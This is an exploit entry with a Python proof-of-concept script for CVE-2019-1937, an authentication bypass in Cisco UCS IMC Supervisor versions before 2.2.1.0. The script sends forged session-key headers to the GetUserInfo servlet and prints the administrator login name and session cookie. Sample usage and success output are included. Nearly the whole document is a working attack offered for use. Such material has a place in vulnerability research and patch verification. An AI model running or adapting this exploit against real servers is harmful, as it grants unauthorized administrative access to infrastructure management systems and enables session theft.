Cisco UCS-IMC Supervisor 2.2.0.0 Authentication Bypass

[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass[+] Cisco IMC Supervisor - < 2.2.1.0[+] Date: 08/21/2019[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html[+] Vulnerability Discovery : Pedro Ribeiro[+] Exploit Author: Fatih Sencer[+] CVE: CVE-2019-1937----------------------------------------------------Usage:./python3 CiscoIMC-Bypass.py -u host[+] Target https://xxxxxx.com[+] Target OK[+] Exploit Succes[+] Login name : admin[+] Cookie : REACTED"""import argparse,requests,warnings,base64,json,random,stringfrom requests.packages.urllib3.exceptions import InsecureRequestWarningwarnings.simplefilter('ignore',InsecureRequestWarning)def init():    parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')    parser.add_argument('-u','--host',help='Host', type=str, required=True)    args = parser.parse_args()    exploit(args)def exploit(args):    session = requests.Session()    headers = {        "User-Agent":                   "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",        "X-Requested-With":             "XMLHttpRequest",        "Referer":                      "https://{}/".format(args.host),        "X-Starship-UserSession-Key":   ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),        "X-Starship-Request-Key":   ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))    }    target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)    print("[+] Target {}".format(args.host))        exp_send = session.get(target, headers=headers, verify=False, timeout=10)    if exp_send.status_code == 200:        print("[+] Target OK")        body_data = json.loads(exp_send.text)        if not (body_data.get('loginName') is None):            print("[+] Exploit Succes")            print("[+] Login name : {}".format(body_data.get('loginName')))            print("[+] Cookie : {}".format(session.cookies.get_dict()))        else:            print("[-] Exploit Failed")                else:        print("[-] N/A")        exit()if __name__ == "__main__":    init()